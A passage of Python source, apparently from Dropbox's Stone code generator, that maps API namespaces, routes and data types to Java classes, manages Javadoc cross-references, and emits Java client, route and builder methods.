return is_struct_type(data_type) and not data_type.has_enumerated_subtypes()
@staticmethod
def param_name(stone_elem):
assert isinstance(stone_elem, (ApiNamespace, Field)), repr(stone_elem)
if isinstance(stone_elem, UnionField):
return camelcase(stone_elem.name + '_value')
else:
return camelcase(stone_elem.name)
def stone_fq_name(self, stone_elem, containing_data_type=None):
assert isinstance(stone_elem, StoneType), repr(stone_elem)
# When the containing data type of a field is a member of inheritance, field references
# can be ambiguous. This is big problem with Unions since we copy all the parent fields
# into the child union in Java. So the same field may appear multiple times, but in
# different classes along the Stone chain of inheritance.
assert isinstance(containing_data_type, DataType) or containing_data_type is None, repr(containing_data_type)
if isinstance(stone_elem, ApiNamespace):
parts = [stone_elem.name]
elif isinstance(stone_elem, DataType):
if is_user_defined_type(stone_elem):
parts = [stone_elem.namespace.name, stone_elem.name]
else:
parts = [stone_elem.name]
elif isinstance(stone_elem, ApiRoute):
namespace = self.route_namespace(stone_elem)
parts = [namespace.name, format_func_name(stone_elem)]
elif isinstance(stone_elem, Field):
containing_data_type = containing_data_type or self.field_containing_data_type(stone_elem)
namespace = containing_data_type.namespace
parts = [namespace.name, containing_data_type.name, stone_elem.name]
else:
raise ValueError("Unsupported Stone type: %s" % type(stone_elem))
return '.'.join(p for p in parts)
def namespace_getter_method(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
return camelcase(namespace.name)
def field_getter_method(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if is_struct_type(containing_data_type):
return camelcase('get_' + field.name)
elif is_union_type(containing_data_type) and self.has_value(field):
return camelcase('get_' + field.name + '_value')
else:
return None
def field_enum_name(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if self.is_enum(containing_data_type):
return allcaps(field.name)
return None
def field_tag_enum_name(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if is_union_type(containing_data_type):
return allcaps(field.name)
return None
def field_tag_match_method_name(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
assert is_union_type(containing_data_type), repr(field)
return camelcase('is_' + field.name)
def field_static_instance(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if is_union_type(containing_data_type):
if self.is_enum(containing_data_type):
return self.field_enum_name(field)
elif not self.has_value(field):
return allcaps(field.name)
return None
def field_factory_method(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if is_union_type(containing_data_type) and self.has_value(field):
return camelcase(field.name)
return None
def field_builder_method(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_types[field]
if field in containing_data_type.all_optional_fields:
return camelcase('with_' + field.name)
return None
def is_java_primitive(self, data_type):
return self.java_class(data_type, generics=False).name[0].islower()
@staticmethod
def is_enum(data_type):
assert isinstance(data_type, DataType), repr(data_type)
if is_union_type(data_type):
return all(is_void_type(f.data_type) for f in data_type.all_fields)
else:
return False
@staticmethod
def has_value(field):
assert isinstance(field, Field), repr(field)
return not is_void_type(field.data_type)
def field_is_optional(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_type(field)
return field in containing_data_type.all_optional_fields
def field_is_required(self, field):
assert isinstance(field, Field), repr(field)
containing_data_type = self._containing_data_type(field)
return field in containing_data_type.all_required_fields
def url_path(self, route):
"""
Server URL path associated with this route.
"""
assert isinstance(route, ApiRoute), repr(route)
return '2/{}/{}'.format(self._namespaces_by_route[route].name, format_func_name(route))
@staticmethod
def has_arg(route):
assert isinstance(route, ApiRoute), repr(route)
return not is_void_type(route.arg_data_type)
@staticmethod
def has_result(route):
assert isinstance(route, ApiRoute), repr(route)
return not is_void_type(route.result_data_type)
@staticmethod
def has_error(route):
assert isinstance(route, ApiRoute), repr(route)
if is_void_type(route.error_data_type):
return False
else:
# we only support user-defined error types
assert is_user_defined_type(route.error_data_type), repr(route)
return True
@staticmethod
def request_style(route):
assert isinstance(route, ApiRoute), repr(route)
return route.attrs.get('style', 'rpc')
@staticmethod
def auth_style(route):
assert isinstance(route, ApiRoute), repr(route)
return route.attrs.get('auth', 'user')
@staticmethod
def route_host(route):
assert isinstance(route, ApiRoute), repr(route)
return route.attrs.get('host', 'api')
def has_builder(self, stone_elem):
assert isinstance(stone_elem, (ApiRoute, DataType)), repr(stone_elem)
if isinstance(stone_elem, DataType):
data_type = stone_elem
return is_struct_type(data_type) and len(data_type.all_optional_fields) > 1
else:
route = stone_elem
return self.request_style(route) == 'download' or self.has_builder(route.arg_data_type)
@staticmethod
def route_method(route):
assert isinstance(route, ApiRoute), repr(route)
return camelcase(format_func_name(route))
@staticmethod
def route_builder_method(route):
assert isinstance(route, ApiRoute), repr(route)
return camelcase(format_func_name(route) + '_builder')
@staticmethod
def namespace_package(namespace, base_package):
return base_package + '.' + namespace.name.replace('_', '').lower()
def java_class(self, stone_elem, boxed=False, generics=True):
assert isinstance(stone_elem, (ApiNamespace, ApiRoute, DataType, Field)), repr(stone_elem)
base_package = self._args.package
if isinstance(stone_elem, ApiNamespace):
namespace = stone_elem
package = self.namespace_package(namespace, base_package)
prefix = self._args.requests_classname_prefix or self._args.client_class
return JavaClass(package + '.' + classname('{}_{}_Requests'.format(prefix, namespace.name)))
elif isinstance(stone_elem, ApiRoute):
route = stone_elem
return self.java_class(self._namespaces_by_route[route])
elif isinstance(stone_elem, Field):
field = stone_elem
return self.java_class(field.data_type, boxed=boxed, generics=generics)
else:
data_type = stone_elem
if is_nullable_type(data_type):
return self.java_class(data_type.data_type, boxed=True, generics=generics)
elif is_user_defined_type(data_type):
package = self.namespace_package(data_type.namespace, base_package)
return JavaClass(package + '.' + classname(data_type.name))
else:
generic_classes = []
if generics and is_list_type(data_type):
generic_classes = [self.java_class(data_type.data_type, boxed=True, generics=True)]
elif generics and is_map_type(data_type):
generic_classes = [self.java_class(data_type.key_data_type, boxed=True), self.java_class(
data_type.value_data_type, boxed=True, generics=True)]
type_map = _TYPE_MAP_BOXED if boxed else _TYPE_MAP_UNBOXED
return JavaClass(type_map[data_type.name], generics=generic_classes)
def builder_class(self, stone_elem):
assert isinstance(stone_elem, (ApiRoute, DataType)), repr(stone_elem)
assert self.has_builder(stone_elem), repr(stone_elem)
if isinstance(stone_elem, ApiRoute):
route = stone_elem
if ',' in self.auth_style(route):
# Use prefix here because multiple builders may be generated
# if the endpoint has multiple auth types
prefix = (self._args.requests_classname_prefix or self._args.client_class) + "_"
else:
prefix = ""
package = self.java_class(route).package
return JavaClass(package + '.' + classname('{}{}_builder'.format(prefix, format_func_name(route))))
else:
data_type = stone_elem
assert is_user_defined_type(data_type), repr(data_type)
data_type_class = self.java_class(data_type)
# nested static class
return JavaClass(data_type_class.fq + '.Builder')
def serializer_class(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
data_type_class = self.java_class(data_type)
return JavaClass(data_type_class.fq + '.Serializer')
def exception_class(self, element):
assert isinstance(element, (DataType, ApiRoute)), repr(element)
if isinstance(element, DataType):
data_type = element
assert self.data_type_has_exception(data_type), repr(data_type)
return JavaClass(self.java_class(element).fq + 'Exception')
else:
route = element
if self.has_error(route):
return self.exception_class(route.error_data_type)
else:
return JavaClass('com.dropbox.core.DbxApiException')
def route_exception_class(self, route):
assert isinstance(route, ApiRoute), repr(route)
if self.has_error(route):
error = route.error_data_type
error_class = self.java_class(error)
return JavaClass(error_class.fq + 'Exception')
else:
return JavaClass('com.dropbox.core.DbxApiException')
def route_throws_classes(self, route):
assert isinstance(route, ApiRoute), repr(route)
exc_classes = []
if self.request_style(route) != 'upload':
# upload routes don't receive the server response in the method call. The request is
# issued later through the Uploader class
route_specific_exc_class = self.route_exception_class(route)
exc_classes.append(route_specific_exc_class)
exc_classes.append(JavaClass('com.dropbox.core.DbxException'))
return exc_classes
def route_uploader_class(self, route):
assert isinstance(route, ApiRoute), repr(route)
return JavaClass(
self.java_class(route).package + '.' + classname(format_func_name(route) + '_Uploader')
)
def route_downloader_class(self, route):
assert isinstance(route, ApiRoute), repr(route)
assert self.request_style(route) == 'download', repr(route)
return JavaClass('com.dropbox.core.DbxDownloader', generics=(
self.java_class(route.result_data_type, boxed=True),
))
def is_used_by_client(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
return data_type in self._client_data_types
def data_type_has_exception(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_user_defined_type(data_type), repr(data_type)
return data_type in self._data_types_with_exception
def field_containing_data_type(self, field):
assert isinstance(field, Field), repr(field)
assert field in self._containing_data_types, repr(field)
return self._containing_data_types[field]
def route_namespace(self, route):
assert isinstance(route, ApiRoute), repr(route)
assert route in self._namespaces_by_route, repr(route)
return self._namespaces_by_route[route]
def _lookup_data_type(self, fq_name):
assert isinstance(fq_name, str), repr(fq_name)
assert '.' in fq_name, repr(fq_name)
namespace_name, data_type_name = split_stone_name(fq_name, max_parts=2)
namespace = self.stone_api.namespaces.get(namespace_name)
if namespace:
for data_type in namespace.data_types:
if data_type.name == data_type_name:
return data_type
def data_type_visibility(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
return self._data_type_visibility[data_type]
def update_data_type_visibility(self, data_type_fq_name, visibility):
data_type = self._lookup_data_type(data_type_fq_name)
if data_type:
self._data_type_visibility[data_type] = max(
self._data_type_visibility[data_type], visibility
)
def serializer_visibility(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
visibility = self._serializer_visibility[data_type]
if not visibility.is_visible and self.data_type_visibility(data_type).is_visible:
# if the containing data type is visible, force the serialize to be visible since
# toString(..) depends on its serializer
return Visibility.PRIVATE
return visibility
def update_serializer_visibility(self, data_type_fq_name, visibility):
data_type = self._lookup_data_type(data_type_fq_name)
if data_type:
self._serializer_visibility[data_type] = max(
self._serializer_visibility[data_type], visibility
)
def mark_data_type_as_used(self, data_type):
self._client_data_types.add(data_type)
class JavaReferences:
def __init__(self, j):
self.j = j
self.data_types = {}
self.routes = {}
self.fields = {}
self._initialize()
def load(self, f):
data = json.load(f, object_hook=JavaReference.from_json)
# resolve all name references
for route in data['routes'].values():
if route.error_ref:
route.error_ref = data['data_types'][route.error_ref]
for field in data['fields'].values():
field.containing_data_type_ref = data['data_types'][field.containing_data_type_ref]
field.route_refs = tuple(
data['routes'][route_ref]
for route_ref in field.route_refs
)
# now update our existing state
self._update(data)
def _update(self, data):
# do data types first, since they are referenced by other types
for key, data_type in data['data_types'].items():
if key not in self.data_types:
self.data_types[key] = data_type
else:
self.data_types[key].update_visibility(data_type.visibility)
self.data_types[key].update_serializer_visibility(data_type.serializer_visibility)
# routes reference their error types
for key, route in data['routes'].items():
if key not in self.routes:
# update error_ref
if route.error_ref:
route.error_ref = self.data_types[route.error_ref.fq_name]
self.routes[key] = route
# fields have data type and route refs
for key, field in data['fields'].items():
if key not in self.fields:
# update refs
field.containing_data_type_ref = self.data_types[field.containing_data_type_ref.fq_name]
field.route_refs = tuple(
self.routes[route_ref.fq_name]
for route_ref in field.route_refs
)
self.fields[key] = field
else:
# update existing route refs
merged_route_refs = list(self.fields[key].route_refs)
for route_ref in field.route_refs:
route_ref = self.routes[route_ref.fq_name]
if route_ref not in merged_route_refs:
merged_route_refs.append(route_ref)
self.fields[key].route_refs = tuple(merged_route_refs)
# need to update our JavaApi with the new visibilities
for key in data['data_types']:
# get merged data type ref for our loaded data types
data_type_ref = self.data_types[key]
self.j.update_data_type_visibility(data_type_ref.fq_name, data_type_ref.visibility)
self.j.update_serializer_visibility(data_type_ref.fq_name, data_type_ref.serializer_visibility)
def serialize(self, f):
return json.dump({
'data_types': self.data_types,
'routes': self.routes,
'fields': self.fields,
}, f, default=self._as_json)
@staticmethod
def _as_json(obj):
if isinstance(obj, JavaReference):
return obj._as_json()
elif isinstance(obj, Visibility):
return obj.name
elif isinstance(obj, JavaClass):
return str(obj)
else:
raise TypeError(repr(obj) + " is not JSON serializable")
def data_type(self, data_type):
j = self.j
if isinstance(data_type, DataType):
name = j.stone_fq_name(data_type)
else:
assert isinstance(data_type, str), repr(data_type)
name = data_type
assert '.' in name, "Must use fully-qualified stone name: %s" % name
return self.data_types.get(name)
def field(self, field, containing_data_type=None):
j = self.j
if isinstance(field, Field):
name = j.stone_fq_name(field, containing_data_type)
else:
# we expect fully-qualified names for string field references
assert containing_data_type is None, repr(field)
assert isinstance(field, str), repr(field)
name = field
assert '.' in name, "Must use fully-qualified stone name: %s" % name
return self.fields.get(name)
def route(self, route):
j = self.j
if isinstance(route, ApiRoute):
name = j.stone_fq_name(route)
else:
assert isinstance(route, str), repr(route)
name = route
assert '.' in name, "Must use fully-qualified stone name: %s" % name
return self.routes.get(name)
def _initialize(self):
j = self.j
# Data types
for namespace in j.stone_api.namespaces.values():
for data_type in namespace.data_types:
self.data_types[j.stone_fq_name(data_type)] = DataTypeReference(j, data_type)
# Routes
route_refs_by_field = defaultdict(list)
for namespace in j.stone_api.namespaces.values():
for route in namespace.routes:
error_ref = None
if is_user_defined_type(route.error_data_type):
error_ref = self.data_types[j.stone_fq_name(route.error_data_type)]
route_ref = RouteReference(j, route, error_ref)
self.routes[j.stone_fq_name(route)] = route_ref
# keep track of fields referenced by routes (required by Javadoc for overloaded methods)
if route_ref.is_method_overloaded:
for field in route.arg_data_type.all_fields:
route_refs_by_field[field].append(route_ref)
# Fields
for namespace in j.stone_api.namespaces.values():
for data_type in namespace.data_types:
data_type_ref = self.data_types[j.stone_fq_name(data_type)]
# Note that we may have duplicate references for the same field. This happens when
# there is inheritance in the struct or union. We want to make sure that both
# :field:`Child.field` and :field:`Parent.field` references work in Stone doc.
for field in data_type.all_fields:
field_fq_name = j.stone_fq_name(field, data_type)
self.fields[field_fq_name] = FieldReference(
j, field, field_fq_name, data_type_ref, route_refs_by_field.get(field, ())
)
class JavaReference:
def __init__(self, fq_name):
assert isinstance(fq_name, str), repr(fq_name)
self.fq_name = fq_name
def __repr__(self):
return '{}({})'.format(type(self).__name__, self.__dict__)
def __str__(self):
return '{}({})'.format(type(self).__name__, self.fq_name)
def _as_json(self):
dct = {}
for k, v in self.__dict__.items():
# avoid cyclic references issue
if isinstance(v, JavaReference):
dct[k] = v.fq_name
elif isinstance(v, Sequence) and all(isinstance(e, JavaReference) for e in v):
dct[k] = [
e.fq_name if isinstance(e, JavaReference) else e
for e in v
]
elif isinstance(v, JavaClass):
dct[k] = str(v)
elif isinstance(v, Sequence) and all(isinstance(e, JavaClass) for e in v):
dct[k] = [str(c) for c in v]
else:
dct[k] = v
dct['_type'] = type(self).__name__
return dct
def _from_json(self, obj):
obj.pop('_type')
self.__dict__.update(obj)
@classmethod
def from_json(cls, obj):
if '_type' in obj:
ref_type = obj['_type']
module = sys.modules[__name__]
assert hasattr(module, ref_type), repr(ref_type)
ref_cls = getattr(module, ref_type)
assert issubclass(ref_cls, cls), repr(ref_cls)
ref = cls.__new__(ref_cls)
ref._from_json(obj)
return ref
return obj
class JavaClassReference(JavaReference):
def __init__(self, name, java_class, visibility=Visibility.NONE):
assert isinstance(java_class, JavaClass), repr(java_class)
assert isinstance(visibility, Visibility), repr(visibility)
super().__init__(name)
self.java_class = java_class
self.visibility = visibility
def update_visibility(self, visibility):
self.visibility = max(visibility, self.visibility)
def _from_json(self, obj):
self.java_class = JavaClass.from_str(obj.pop('java_class'))
self.visibility = Visibility.from_name(obj.pop('visibility'))
super()._from_json(obj)
class RouteReference(JavaClassReference):
def __init__(self, j, route, error_ref):
assert isinstance(route, ApiRoute), repr(route)
super().__init__(
j.stone_fq_name(route),
j.java_class(route),
Visibility.PUBLIC
)
self.namespace_name = j.route_namespace(route).name
self.method = j.route_method(route)
self.has_builder = j.has_builder(route)
self.builder_method = j.route_builder_method(route) if self.has_builder else None
self.error_ref = error_ref
self.url_path = j.url_path(route)
if is_struct_type(route.arg_data_type):
self.is_method_overloaded = (
any(route.arg_data_type.all_optional_fields) and not j.has_builder(route.arg_data_type)
)
if self.is_method_overloaded:
fields = route.arg_data_type.all_fields
else:
fields = route.arg_data_type.all_required_fields
self.method_arg_classes = tuple(j.java_class(field) for field in fields)
else:
self.method_arg_classes = ()
self.is_method_overloaded = False
def _from_json(self, obj):
self.method_arg_classes = tuple(
JavaClass.from_str(c) for c in obj.pop('method_arg_classes')
)
super()._from_json(obj)
class DataTypeReference(JavaClassReference):
def __init__(self, j, data_type):
assert isinstance(data_type, DataType), repr(data_type)
super().__init__(
j.stone_fq_name(data_type),
j.java_class(data_type),
visibility=j.data_type_visibility(data_type)
)
self.has_builder = j.has_builder(data_type)
self.builder_class = j.builder_class(data_type) if self.has_builder else None
self.serializer_visibility = j.serializer_visibility(data_type)
def update_serializer_visibility(self, visibility):
self.serializer_visibility = max(self.serializer_visibility, visibility)
def _from_json(self, obj):
self.builder_class = JavaClass.from_str(obj.pop('builder_class')) if obj['builder_class'] else None
self.serializer_visibility = Visibility.from_name(obj.pop('serializer_visibility'))
super()._from_json(obj)
class FieldReference(JavaReference):
def __init__(self, j, field, fq_name, containing_data_type_ref, route_refs):
assert isinstance(field, Field), repr(field)
assert isinstance(containing_data_type_ref, DataTypeReference), repr(containing_data_type_ref)
assert isinstance(route_refs, Sequence), repr(route_refs)
assert all(isinstance(r, RouteReference) for r in route_refs), repr(route_refs)
super().__init__(fq_name)
self.param_name = j.param_name(field)
self.static_instance = j.field_static_instance(field)
self.getter_method = j.field_getter_method(field)
self.containing_data_type_ref = containing_data_type_ref
self.route_refs = route_refs
class JavaCodeGenerationInstance:
"""
Java code generation instance for a particular Stone tree (:class:`stone.api.Api`).
:ivar :class:`GeneratorContext` ctx: context for current generation
"""
def __init__(self, g, api):
self.api = api
self.g = g
self.j = JavaApi(api, self.g.args)
# some classes are unused, but we still want them to be generated
self._mark_special_unused_classes()
self.refs = JavaReferences(self.j)
# JavaClassWriter, created with self.class_writer(..)
self.w = None
@contextmanager
def class_writer(self, stone_type_or_class, package_doc=None):
assert isinstance(stone_type_or_class, (StoneType, JavaClass)), repr(stone_type_or_class)
if isinstance(stone_type_or_class, JavaClass):
java_class = stone_type_or_class
stone_element = None
else:
java_class = self.j.java_class(stone_type_or_class)
stone_element = stone_type_or_class
with JavaClassWriter(self.g, self.j, self.refs, java_class, stone_element=stone_element,
package_doc=package_doc) as w:
assert self.w is None, self.w
self.w = w
yield w
self.w = None
def generate_all(self):
self.update_javadoc_refs()
self.generate_client()
for namespace in self.api.namespaces.values():
self.generate_namespace(namespace)
def generate_data_types(self):
for namespace in self.api.namespaces.values():
for data_type in namespace.data_types:
self.generate_data_type(data_type)
def update_javadoc_refs(self):
javadoc_refs_path = self.g.args.javadoc_refs
if javadoc_refs_path is None:
return
# load existing file and merge it with our current state
if os.path.exists(javadoc_refs_path):
with open(javadoc_refs_path) as f:
self.refs.load(f)
# save our updated state back to the file
with open(javadoc_refs_path, 'w') as f:
self.refs.serialize(f)
def generate_client(self):
j = self.j
namespaces = [
ns for ns in self.api.namespaces.values()
if ns.routes
]
client_class = JavaClass(self.g.args.package + '.' + self.g.args.client_class)
with self.class_writer(client_class) as w:
w.importer.add_imports(*[
j.java_class(namespace) for namespace in namespaces
])
w.importer.add_imports('com.dropbox.core.v2.DbxRawClientV2')
w.write_imports()
w.out('')
w.javadoc(self.g.args.client_javadoc or "")
with w.class_block(client_class):
w.out('protected final DbxRawClientV2 _client;')
w.out('')
for namespace in namespaces:
w.out('private final %s %s;', j.java_class(namespace), j.param_name(namespace))
w.out('')
w.javadoc(
"""
For internal use only.
""",
params=(('_client', 'Raw v2 client to use for issuing requests'),)
)
with w.block('protected %s(DbxRawClientV2 _client)', client_class.name):
w.out('this._client = _client;')
for namespace in namespaces:
w.out('this.%s = new %s(_client);', j.param_name(namespace), j.java_class(namespace))
for namespace in namespaces:
w.out('')
w.javadoc(
"""
Returns client for issuing requests in the {@code "%s"} namespace.
""" % namespace.name,
returns="Dropbox %s client" % namespace.name
)
with w.block("public %s %s()", j.java_class(namespace), j.namespace_getter_method(namespace)):
w.out('return %s;' % j.param_name(namespace))
def generate_namespace(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
j = self.j
# add documentation to our packages
self.generate_package_javadoc(namespace)
# create class files for all namespace data types in this package
for data_type in namespace.data_types:
self.generate_data_type(data_type)
for route in namespace.routes:
# generate per-route uploader helpers
if j.request_style(route) == 'upload':
self.generate_route_uploader(route)
# generate all necessary builder classes for routes that support it
if j.has_builder(route):
self.generate_route_builder(route)
if namespace.routes:
self.generate_namespace_routes(namespace)
def _mark_special_unused_classes(self):
j = self.j
if not self.g.args.unused_classes_to_generate:
return
special_class_names = self.g.args.unused_classes_to_generate.split(', ')
if not special_class_names:
return
special_data_types = [
unwrap_nullable(data_type)[0]
for namespace in j.stone_api.namespaces.values()
for data_type in namespace.data_types
if data_type.name in special_class_names
]
all_special_data_types = set()
# mark all special types public and used, and likewise mark all of their
# referenced types as public and used
def _propagate_changes(data_type):
all_special_data_types.add(data_type)
if is_void_type(data_type) or not is_user_defined_type(data_type):
return
field_types = [unwrap_nullable(f.data_type)[0] for f in data_type.all_fields]
for field_type in field_types:
if field_type not in all_special_data_types:
_propagate_changes(field_type)
if data_type.parent_type:
if data_type.parent_type not in all_special_data_types:
_propagate_changes(data_type.parent_type)
for data_type in special_data_types:
_propagate_changes(data_type)
for data_type in all_special_data_types:
if is_user_defined_type(data_type) and not is_void_type(data_type):
data_type_fq_name = j.stone_fq_name(data_type)
# mark public
j.update_data_type_visibility(data_type_fq_name, Visibility.PUBLIC)
j.update_serializer_visibility(data_type_fq_name, Visibility.PUBLIC)
# mark as being referenced somewhere so that we generate
j.mark_data_type_as_used(data_type)
def generate_namespace_routes(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
j = self.j
with self.class_writer(namespace) as w:
w.importer.add_imports_for_namespace(namespace)
w.write_imports()
w.out('')
w.javadoc('Routes in namespace "%s".' % namespace.name)
with w.class_block(namespace):
w.out('// namespace %s (%s)', namespace.name, ', '.join(j.get_spec_filenames(namespace)))
w.out('')
w.out('private final DbxRawClientV2 client;')
w.out('')
with w.block('public %s(DbxRawClientV2 client)', j.java_class(namespace)):
w.out('this.client = client;')
for route in namespace.routes:
w.out('')
w.out('//')
w.out('// route %s', j.url_path(route))
w.out('//')
self.generate_route_base(route)
if j.has_arg(route):
self.generate_route(route, required_only=True)
# we don't use builders if we have too few optional fields. Instead we just
# create another method call. We have an exception for download endpoints, which
# recently added builders for previous routes that had no builders
has_optional_fields = is_struct_type(
route.arg_data_type) and route.arg_data_type.all_optional_fields
if has_optional_fields and not j.has_builder(route.arg_data_type):
self.generate_route(route, required_only=False)
# route can have builder if arg does or if route has a particular request
# style. So check route for builder instead of arg here:
if j.has_builder(route):
self.generate_route_builder_method(route)
def generate_package_javadoc(self, namespace):
assert isinstance(namespace, ApiNamespace), repr(namespace)
w = self.w
j = self.j
requests_reference_doc = ''
# different routes may have different namespace classes based on the client configuration we
# used. Go through all the routes references in a namespace to figure out all the requests
# classes we have available.
request_classes = OrderedDict()
for route_ref in self.refs.routes.values():
if route_ref.namespace_name == namespace.name:
request_classes[route_ref.java_class] = None
if request_classes:
requests_reference_doc += 'See %s for a list of possible requests for this namespace.' % (
', '.join("{@link %s}" % c for c in request_classes)
)
package_doc = (
"""
{}
{}
""".format(namespace.doc or '', requests_reference_doc)
)
package_info_class = JavaClass(j.java_class(namespace).package + '.' + 'package-info')
with self.class_writer(package_info_class, package_doc=package_doc):
pass
def generate_route_base(self, route, force_public=False):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
is_download = j.request_style(route) == 'download'
is_public = force_public or (
not (is_struct_type(route.arg_data_type) or is_download)
)
if j.request_style(route) == 'upload':
returns = "Uploader used to upload the request body and finish request."
return_class = j.route_uploader_class(route)
elif j.request_style(route) == 'download':
returns = "Downloader used to download the response body and view the server response."
return_class = j.route_downloader_class(route)
elif j.has_result(route):
returns = route.result_data_type
return_class = j.java_class(route.result_data_type)
else:
returns = None
return_class = JavaClass('void')
if is_public:
deprecated = None # automatically determine from route
visibility = 'public'
else:
deprecated = False # Don't mark private methods deprecated since we don't care
visibility = '' # package private
throws_classes = j.route_throws_classes(route)
throws = ', '.join(w.resolved_class(c) for c in throws_classes)
args = []
params = []
if j.has_arg(route):
arg_class = j.java_class(route.arg_data_type)
args.append(w.fmt('%s arg', arg_class))
params.append(('arg', route.arg_data_type.doc))
if is_download:
if is_public:
headers_var = w.fmt('%s.<%s>emptyList()',
JavaClass('java.util.Collections'),
JavaClass('com.dropbox.core.http.HttpRequestor.Header'))
else:
headers_var = '_headers'
headers_class = JavaClass.from_str('java.util.List<com.dropbox.core.http.HttpRequestor.Header>')
args.append(w.fmt('%s %s', headers_class, headers_var))
params.append((headers_var, 'Extra headers to send with request.'))
w.out('')
w.javadoc(route, returns=returns, deprecated=deprecated, params=params)
with w.block('%s %s %s(%s) throws %s',
visibility,
return_class,
j.route_method(route),
', '.join(args),
throws):
if j.request_style(route) == 'rpc':
self.generate_route_rpc_call(route, 'arg')
elif j.request_style(route) == 'upload':
self.generate_route_upload_call(route, 'arg')
elif j.request_style(route) == 'download':
self.generate_route_download_call(route, 'arg', headers_var)
else:
assert False, "unrecognized route request style: %s" % j.request_style(route)
def generate_route(self, route, required_only=True):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
assert j.has_arg(route), repr(route)
# routes with union or builtin args (e.g. UInt32, List) are always made public and should
# already be generated by generate_route_base(..).
if not is_struct_type(route.arg_data_type):
# One exception is if the route is a download style endpoint. We may have extra headers
# we need to pass up for download endpoints, so those routes are made private. So just
# generate the base route again, but force it to generate the public version without the
# extra headers argument:
if j.request_style(route) == 'download':
self.generate_route_base(route, force_public=True)
return
# should only be left with struct args
assert is_struct_type(route.arg_data_type), repr(route.arg_data_type)
arg = route.arg_data_type
result = route.result_data_type
error = route.error_data_type
if not required_only:
assert not j.has_builder(arg), "Arg %s has builder, so unpacked method unnecessary." % repr(route)
n_optional = len(arg.all_optional_fields)
# we disable boxing for this method, which can be dangerous if we have more than one
# optional argument. It will essentially prevent users from being able to use
# default values for part of their request arguments. Consider updating code if
# you want to support this.
assert n_optional == 1, "More than one optional field should permit boxing! %s" % repr(route)
if j.request_style(route) == 'upload':
returns = "Uploader used to upload the request body and finish request."
return_class = j.route_uploader_class(route)
elif j.request_style(route) == 'download':
returns = "Downloader used to download the response body and view the server response."
return_class = j.route_downloader_class(route)
elif j.has_result(route):
returns = result
return_class = j.java_class(route.result_data_type)
else:
returns = None
return_class = JavaClass('void')
if required_only:
fields = arg.all_required_fields
else:
fields = arg.all_fields
args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f)) for f in fields
)
default_fields = tuple(f for f in arg.all_optional_fields if f.has_default)
doc = route.raw_doc or ''
if required_only and default_fields:
if j.has_builder(route):
doc += """
The default values for the optional request parameters will be used. See %s
for more details.""" % w.javadoc_ref(j.builder_class(route))
else:
assert len(default_fields) == 1, default_fields
default_field = default_fields[0]
doc += """
The {{@code {}}} request parameter will default to {{@code {}}} (see {{@link #{}({})}}).""".format(
j.param_name(default_field),
w.java_default_value(default_field),
j.route_method(route),
','.join(w.resolved_class(j.java_class(f, generics=False)) for f in arg.all_fields),
)
throws_classes = j.route_throws_classes(route)
throws = ', '.join(w.resolved_class(c) for c in throws_classes)
w.out('')
w.javadoc(doc, stone_elem=route, fields=fields, returns=returns, allow_defaults=False)
with w.block('public %s %s(%s) throws %s', return_class, j.route_method(route), args, throws):
arg_class = j.java_class(arg)
required_args = ', '.join(j.param_name(f) for f in arg.all_required_fields)
if required_only:
w.out('%s _arg = new %s(%s);', arg_class, arg_class, required_args)
else:
optional_fields = arg.all_optional_fields
for field in optional_fields:
# disable translation of nulls to default
self.generate_field_validation(field, allow_default=False)
if j.has_builder(arg):
# use builder to build with optional fields
w.out('%s _arg = %s.newBuilder(%s)', arg_class, required_args)
with self.g.indent():
for field in optional_fields:
w.out('.%s(%s)', j.field_builder_method(field), j.param_name(field))
w.out('.build();')
else:
# use full constructor
all_args = ', '.join(j.param_name(f) for f in arg.all_fields)
w.out('%s _arg = new %s(%s);', arg_class, arg_class, all_args)
if j.has_result(route) or j.request_style(route) in ('upload', 'download'):
args = ['_arg']
if j.request_style(route) == 'download':
# extra request headers
args.append(w.fmt('%s.<%s>emptyList()',
JavaClass('java.util.Collections'),
JavaClass('com.dropbox.core.http.HttpRequestor.Header')))
w.out('return %s(%s);', j.route_method(route), ', '.join(args))
else:
w.out('%s(_arg);', j.route_method(route))
def generate_route_builder_method(self, route):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
assert j.has_builder(route), repr(route)
arg = route.arg_data_type
result = route.result_data_type
return_class = j.builder_class(route)
if j.request_style(route) == 'upload':
returns = "Uploader builder for configuring request parameters and instantiating an uploader."
elif j.request_style(route) == 'download':
returns = "Downloader builder for configuring the request parameters and instantiating a downloader."
else:
returns = "Request builder for configuring request parameters and completing the request."
required_fields = arg.all_required_fields
args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f))
for f in required_fields
)
w.out('')
w.javadoc(route, fields=required_fields, returns=returns)
with w.block('public %s %s(%s)', j.builder_class(route), j.route_builder_method(route), args):
builder_args = ', '.join(j.param_name(f) for f in required_fields)
if j.has_builder(arg):
w.out('%s argBuilder_ = %s.newBuilder(%s);',
j.builder_class(arg),
j.java_class(arg),
builder_args,
)
w.out('return new %s(this, argBuilder_);', return_class)
else:
w.out('return new %s(this, %s);', return_class, builder_args)
def translate_error_wrapper(self, route, error_wrapper_var):
assert isinstance(route, ApiRoute), repr(route)
assert isinstance(error_wrapper_var, str), repr(error_wrapper_var)
w = self.w
j = self.j
if j.has_error(route):
